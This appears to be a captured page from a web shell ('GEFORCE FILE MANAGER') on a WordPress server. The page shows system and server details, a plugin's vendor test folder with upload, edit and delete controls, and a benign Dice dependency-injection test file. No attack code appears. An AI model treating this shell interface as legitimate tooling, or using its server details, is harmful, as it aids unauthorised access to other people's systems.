[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
vendor
/
level-2
/
dice
/
tests
/
TestData
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 Basic.php
2,131 B
SET
[ EDIT ]
|
[ DEL ]
📄 Call.php
981 B
SET
[ EDIT ]
|
[ DEL ]
📄 ConstructParams.php
1,685 B
SET
[ EDIT ]
|
[ DEL ]
📄 CreateArgs.php
1,432 B
SET
[ EDIT ]
|
[ DEL ]
📄 NamedInstances.php
869 B
SET
[ EDIT ]
|
[ DEL ]
📄 Namespace.php
596 B
SET
[ EDIT ]
|
[ DEL ]
📄 ShareInstances.php
1,344 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: ShareInstances.php
<?php /* @description Dice - A minimal Dependency Injection Container for PHP * * @author Tom Butler tom@r.je * * @copyright 2012-2018 Tom Butler <tom@r.je> | https:// r.je/dice.html * * @license http:// www.opensource.org/licenses/bsd-license.php BSD License * * @version 3.0 */ class TestSharedInstancesTop { public $shared; public $share1; public $share2; public function __construct(Shared $shared, SharedInstanceTest1 $share1, SharedInstanceTest2 $share2) { $this->shared = $shared; $this->share1 = $share1; $this->share2 = $share2; } } class SharedInstanceTest1 { public $shared; public function __construct(Shared $shared) { $this->shared = $shared; } } class SharedInstanceTest2 { public $shared; public function __construct(Shared $shared) { $this->shared = $shared; } } class M1 { public $f; public function __construct(F $f) { $this->f = $f; } } class M2 { public $e; public function __construct(E $e) { $this->e = $e; } } class Foo77 { public $bar; public function __construct(Bar77 $bar) { $this->bar = $bar; } } class Bar77 { public $a; public function __construct($a) { $this->a = $a; } } class Baz77 { public static function create() { return new Bar77('Z'); } } class Shared { public $uniq; public function __construct() { $this->uniq = uniqid(); } }